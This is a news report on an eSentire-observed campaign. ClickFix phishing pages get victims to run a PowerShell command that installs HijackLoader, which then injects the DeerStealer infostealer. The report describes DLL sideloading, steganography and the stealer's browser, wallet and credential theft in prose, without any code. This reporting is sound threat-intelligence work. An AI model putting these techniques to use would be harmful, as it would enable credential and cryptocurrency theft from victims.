Threat Actors Exploit HijackLoader and DeerStealer to Compromise Victims

A new wave of cyber-attacks involving HijackLoader and DeerStealer has been observed by cybersecurity researchers employing phishing tactics to lure victims into executing malicious commands.

According to eSentire’s Threat Response Unit (TRU), which discovered the campaign, it utilizes ClickFix as the initial access vector.

Victims are redirected to a phishing page instructing them to run a PowerShell command via the Windows Run prompt. This command downloads an installer named now.msi, which initiates a series of actions culminating in the execution of HijackLoader and the release of the DeerStealer payload.

eSentire reports that HijackLoader has been active since 2023 and is known for its use of steganography, specifically hiding configuration data in PNG images.

Once executed, the loader exploits legitimate binaries to run unsigned malicious code, ultimately injecting DeerStealer into memory.

DeerStealer’s Expansive Theft Capabilities

DeerStealer, also referred to as XFiles Spyware on dark-web forums by a user named LuciferXfiles, is a subscription-based infostealer with capabilities that extend beyond basic credential theft.

The malware:

– Extracts data from over 50 web browsers
– Hijacks 14+ cryptocurrency wallet types via clipboard monitoring
– Harvests credentials from messengers, FTP, VPN, email, and gaming clients
– Includes hidden VNC for stealthy remote access
– Uses encrypted HTTPS channels for command-and-control (C2) communication

Additionally, the malware incorporates modular obfuscation and utilizes virtual machines to decrypt strings, complicating traditional analysis techniques.

Command Line Trickery

The attack initiates when the user unwittingly runs an encoded command that fetches the installer.

Although the installer employs a signed binary from COMODO, it loads a manipulated DLL to hijack execution. This altered DLL ultimately decrypts the next stage, which injects DeerStealer into another legitimate process.

Despite publicly available tools that can decode HijackLoader’s configuration, attackers persist in utilizing the same methods, suggesting either ignorance or a disregard for detection risks.

Expanding Threat, Evolving Tools

eSentire has warned that DeerStealer is consistently evolving, with upcoming features anticipated to include MacOS support, AI-driven enhancements, and additional client targets.

Threat actors subscribing to higher pricing tiers—up to $3000 per month—gain access to additional services such as re-encryption, payload signing, and advanced customization.

As these tools become increasingly sophisticated, defenders must remain vigilant.

eSentire’s TRU recommends continuous threat monitoring alongside updates to endpoint protection mechanisms to detect emerging loaders and stealers before any significant damage occurs.